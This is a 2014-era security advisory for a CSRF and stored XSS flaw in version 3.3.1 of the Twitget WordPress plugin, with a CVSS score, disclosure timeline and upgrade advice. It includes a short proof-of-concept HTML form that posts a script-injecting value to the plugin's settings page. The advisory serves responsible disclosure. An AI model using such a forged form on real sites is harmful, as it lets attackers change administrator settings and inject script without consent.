CSRF/XSS vulnerability in Twitget 3.3.1


Last revised:

If a logged-in administrator visits a specially crafted page, options can be updated (CSRF) without their consent, and some of those options are output unescaped into the form (XSS). In this example the XSS occurs at line 755 in twitget.php. The nonce-checking should have occurred somewhere around line 661 in the same file.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 6.4 Medium
Vector Network
Complexity Low
Authentication None
Confidentiality Partial
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

<form action="http://localhost/wp-admin/options-general.php?page=twitget/twitget.php" method="POST">
  <input type="text" name="twitget_username" value="john_smith">
  <input type="text" name="twitget_consumer_key" value="&quot;>&lt;script>alert('dxw')&lt;/script>">
  <input type="submit">

Advisory timeline

  • 2013-07-30: Discovered
  • 2014-03-18: Reported to
  • 2014-04-09: Author reports fixed in version 3.3.3.

Mitigation/further actions

Upgrade to version 3.3.3 or later.